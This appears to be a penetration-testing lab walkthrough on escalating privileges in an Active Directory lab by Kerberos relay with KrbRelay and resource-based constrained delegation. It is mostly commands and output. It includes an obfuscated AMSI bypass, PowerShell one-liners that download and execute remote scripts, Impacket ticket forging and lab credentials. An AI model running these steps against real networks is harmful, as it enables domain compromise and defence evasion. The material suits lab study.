# KrbRelay Up - Linux

* Another very useful technic to escalate privileges is kerberos relay, like implemented in [KrbRelayUp](https://github.com/Dec0ne/KrbRelayUp)
* As KrbRelayUp is detected by defender, we will use the step by step approach like [this writeup](https://gist.github.com/tothi/bf6c59d6de5d0c9710f23dae5750c4b9) by @an0n\_r0, using @cube0x0 [KrbRelay](https://github.com/cube0x0/KrbRelay)
* At the time of writing KrbRelay is not detected by defender.
* The conditions to exploit this privesc is LDAP signing is NOT enforced, we can check that with cme ldap-signing module :

```
 crackmapexec ldap 192.168.56.10-12 -u elena.lopez -p princesa1 -d north.newyork.local -M ldap-signing
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FpuM9BDrhkUhrLYZFtmQ3%2Fimage.png?alt=media&#x26;token=13d0ef38-7581-49e0-84b7-5257a4bb0834" alt=""><figcaption></figcaption></figure>

**Add computer and RBCD**

* To exploit krbrelay by adding a computer, you must be able to add new Computer, we can check that with cme MAQ module

```
crackmapexec ldap 192.168.56.11 -u elena.lopez -p princesa1 -d north.newyork.local -M MAQ
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FrTQpCcxGu6wejtNaEAEf%2Fimage.png?alt=media&#x26;token=8c2d2687-35af-4059-9031-90e986fc309c" alt=""><figcaption></figcaption></figure>

### Add computer :&#x20;

```
addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/pacofish:pacofish'
addcomputer.py -computer-name 'krbrelay$' -computer-pass 'ComputerPassword' -dc-host bronx.north.newyork.local -domain-netbios NORTH 'north.newyork.local/elena.lopez:princesa1'
```

### Get the SID of that computer:&#x20;

#### From windows

```
$o = ([ADSI]"LDAP://CN=krbrelay,CN=Computers,DC=north,DC=newyork,DC=local").objectSID
(New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value
S-1-5-21-3634065772-4036021599-3644360361-1136
```

#### From Linux

```
lookupsid.py  -domain-sids north.newyork.local/elena.lopez:princesa1@192.168.56.10 0
```

```
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1')
```

### Check ports

#### xrdp

```
xfreerdp /u:pacofish /p:pacofish /v:192.168.56.11 /cert-ignore
```

```
PS C:\Users\pacofish\Desktop> .\CheckPort.exe
[*] Looking for available ports..
[*] SYSTEM Is allowed through port 443
```

### Launch krbrelay

CLISID: `CIeAxiInstallerService Class`

```
https://strontic.github.io/xcyclopedia/library/clsid_90F18417-F0F1-484E-9D3C-59DCEEE5DBD8.html
```

```
PS C:\Users\elena.lopez\Desktop> .\KrbRelay.exe -spn ldap/bronx.north.newyork.local -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd S-1-5-21-3634065772-4036021599-3644360361-1136 -port 443
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FglxCjAiqzyeUEQGLl2s8%2Fimage.png?alt=media&#x26;token=52e6d4b1-407e-46fc-b824-21068b55bc46" alt=""><figcaption></figcaption></figure>

### Now we finish with RBCD exploitation

#### From Linux Impacket :&#x20;

```
getTGT.py -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$':'ComputerPassword'
export KRB5CCNAME=/workspace/krbrelay\$.ccache
getST.py -impersonate 'administrator' -spn 'CIFS/yonkers.north.newyork.local' -k -no-pass -dc-ip 'bronx.north.newyork.local' 'north.newyork.local'/'krbrelay$'
export KRB5CCNAME=/workspace/administrator@CIFS_yonkers.north.newyork.local@NORTH.NEWYORK.LOCAL.ccache
wmiexec.py -k @yonkers.north.newyork.local

C:\>whoami
north\administrator
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FjIqDRdr8TompHChFibpb%2Fimage.png?alt=media&#x26;token=2f62db14-47da-4550-8380-d208bf760d82" alt=""><figcaption></figcaption></figure>

#### with Rubeus from Windows

```
$x=[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUt'+'ils');$y=$x.GetField('am'+'siCon'+'text',[Reflection.BindingFlags]'NonPublic,Static');$z=$y.GetValue($null);[Runtime.InteropServices.Marshal]::WriteInt32($z,0x41424344)
iex(new-object system.net.webclient).downloadstring('http://192.168.56.31:8080/amsi_rmouse.txt')
iex(new-object net.webclient).downloadstring('http://192.168.56.31:8080/PowerSharpPack/PowerSharpPack.ps1')
PowerSharpPack -rubeus -Command "hash /password:ComputerPassword"
PowerSharpPack -rubeus -Command "s4u /user:krbrelay$ /rc4:0EDDEDC35EB7B7ECDE0C9F0564E54C83 /impersonateuser:administrator /msdsspn:host/yonkers/ptt"
```

* And just like the writeup made by @an0n\_r0 we launch [SCMUACBypass.exe](https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82) by Tyranid and get a system shell

<figure><img src="https://mayfly277.github.io/assets/blog/GOAD/privesc_withrubeus.png" alt=""><figcaption></figcaption></figure>

Without AV or if you modify/obfuscate KrbRelayUp you can do the all things with the following commands:&#x20;

```
.\KrbRelayUp.exe relay -Domain north.newyork.local -CreateNewComputerAccount -ComputerName evilhost2$ -ComputerPassword pass@123
./KrbRelayUp.exe spawn -m rbcd -d north.newyork.local -dc bronx.north.newyork.local -cn evilhost2$ -cp pass@123
```

* KrbRelay can also be used to relay to ADCS or to add msDS-KeyCredentialLink and exploit with ShadowCredentials. All you need to know is on [this page](https://github.com/Dec0ne/KrbRelayUp), this is leave as an exercice to the reader.

**With other methods**

<br>